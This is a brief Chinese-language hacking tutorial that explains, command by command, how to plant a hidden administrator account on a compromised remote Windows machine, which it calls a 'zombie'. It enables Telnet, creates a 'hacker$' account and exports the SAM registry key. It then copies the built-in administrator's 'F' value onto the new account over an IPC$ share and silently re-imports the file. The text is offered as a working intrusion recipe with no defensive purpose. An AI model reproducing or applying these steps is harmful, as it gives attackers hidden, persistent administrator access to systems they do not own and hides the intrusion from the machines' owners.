首先通过使用OpenTelnet.exe工具来开启远程主机的TELNET服务,然后TELNET远程登陆得到一个shell,创建一个新的帐户,命令为:
net user hacker$ youkou /add,然后就来导出注册表项HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users,运行命令:
regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/,其中/e 是regedit.exe的参数,在HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users这个键的一定要 以“/”结尾。
断开TELNET连接,建立IPC会话:net use //192.XX.XX.2/ipc$ "123" /user:"administrator,然后将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy //192.XX.XX.2/D$/hacker.reg,用记事本编辑,将超级用户对应的项000001F4下的键“F”的值复制,并覆盖 hacker$对应的项000003EE下的键“F”的值(hacker$对应的项在不同的机器而不同),编辑好后再上传:copy hacker.reg //192.XX.XX.2/D$/hacker1.reg 。
再TELNET到远程主机,使用命令net user hacker$ /del删除hacker$帐户,然后把hacker.reg导入,命令为:regedit.exe /s hacker.reg,其中参数/s表示以安静模式导入。这样就成功创建了一个隐藏的超级用户。